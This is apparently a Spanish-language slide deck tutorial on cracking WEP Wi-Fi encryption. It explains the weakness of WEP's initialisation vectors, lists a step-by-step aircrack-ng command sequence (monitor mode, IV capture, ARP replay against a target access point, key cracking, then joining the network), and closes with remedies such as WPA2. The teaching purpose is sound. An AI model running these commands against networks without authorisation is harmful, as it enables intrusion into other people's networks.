Cracking WEP
-
Upload
hernan-reyes -
Category
Technology
-
view
5.105 -
download
5
description
Transcript of Cracking WEP
![Page 1: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/1.jpg)
@jesusbolivar
Cracking WEP
![Page 2: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/2.jpg)
@jesusbolivar
WEP – Wired Equivalent Privacy
• Protocolo de encriptación • 5/13 caracteres ASCII o 10/26 caracteres
hexadecimales • Vulnerabilidades descubiertas en 2001• Sustituido por WPA (Wi-Fi Protected Access)
en 2003• Declarado obsoleto en 2004
![Page 3: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/3.jpg)
@jesusbolivar
El Problema
• Protocolo defectuoso• 40/104 bits de clave + 24 bits de vector de
inicialización• 50 % de probabilidad de que un VI se repita
después de 5000 paquetes• El numero máximo de VIs diferentes es
limitado
![Page 4: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/4.jpg)
@jesusbolivar
El Ataque
• Hacer que el Access Point agote los VIs posibles
• Recolectar 50.000+ VIs• Conseguir la clave utilizando un método
estadístico • Tiempo de ejecución 5-15 min
![Page 5: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/5.jpg)
@jesusbolivar
El Ataque
• airmon-ng start wlan0• airodump-ng -c canal -w test --encrypt wep mon0
• aireplay-ng -3 -b mac_ap -h mac_cliente_conectado wlan0
• aircrack-ng -e nombrered test*.cap
![Page 6: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/6.jpg)
@jesusbolivar
El Ataque
• airmon-ng stop mon0• airmon-ng stop wlan0• ifconfig wlan0 down• iwconfig wlan0 channel x essid nombrered key s:clave mode managed
• ifconfig wlan0 up• service networking restart
![Page 7: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/7.jpg)
@jesusbolivar
The Tools
• BackTrack 4• Suite Aircrack-ng• Tarjeta inalámbrica soportada o paciencia… en
algunos casos :)
![Page 8: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/8.jpg)
@jesusbolivar
El Remedio
• WPA/WPA2• IPSec• WEP en Modo Open (solo un poco mas seguro
que WEP)
![Page 9: Cracking WEP](https://reader036.fdocuments.ec/reader036/viewer/2022082809/557ab824d8b42acf1b8b4811/html5/thumbnails/9.jpg)
@jesusbolivar
Sources
• http://www.aircrack-ng.org/doku.php• http://www.backtrack-linux.org• http://es.wikipedia.org/wiki/WEP